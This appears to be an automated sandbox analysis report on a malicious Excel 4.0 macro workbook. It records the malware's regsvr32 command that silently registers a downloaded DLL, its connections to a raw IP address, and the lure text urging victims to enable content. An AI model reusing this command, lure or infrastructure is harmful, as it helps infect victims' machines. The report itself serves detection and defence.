Loading ...

Play interactive tourEdit tour

Analysis Report transfer_summ_188108012.xlsb

Overview

General Information

Sample Name:transfer_summ_188108012.xlsb
Analysis ID:433175
MD5:1b248ad3215a78ee6b006f3aa6bc68d7
SHA1:68d5e1de3e7a2f2a8ef3068e6ca84675388263fd
SHA256:5b01a95d0fd0be91d68e35bc0d9c273eefadd24453c80a1a3a2ed3436f13220e
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6792 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6636 cmdline: regsvr32 -s ..\jbeiwmje.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\jbeiwmje.dll, CommandLine: regsvr32 -s ..\jbeiwmje.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6792, ProcessCommandLine: regsvr32 -s ..\jbeiwmje.dll, ProcessId: 6636

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.180.199.125:80
    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.180.199.125:80
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.125
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.125
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.125
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.cortana.ai
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.office.net
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.onedrive.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://augloop.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cdn.entity.
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cortana.ai
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cortana.ai/api
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://cr.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://directory.services.
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://graph.windows.net
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://graph.windows.net/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://login.windows.local
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://management.azure.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://management.azure.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://messaging.office.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://officeapps.live.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://onedrive.live.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://outlook.office.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://settings.outlook.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://tasks.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. PROTECTED VIEW This f
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of document. S
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: transfer_summ_188108012.xlsbInitial sample: CALL
    Source: transfer_summ_188108012.xlsbInitial sample: EXEC
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal64.expl.evad.winXLSB@3/9@0/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D4FB8358-5C85-4BE1-A54E-3E8BE1C81EE3} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\jbeiwmje.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\jbeiwmje.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: transfer_summ_188108012.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: transfer_summ_188108012.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: transfer_summ_188108012.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: transfer_summ_188108012.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: transfer_summ_188108012.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\jbeiwmje.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
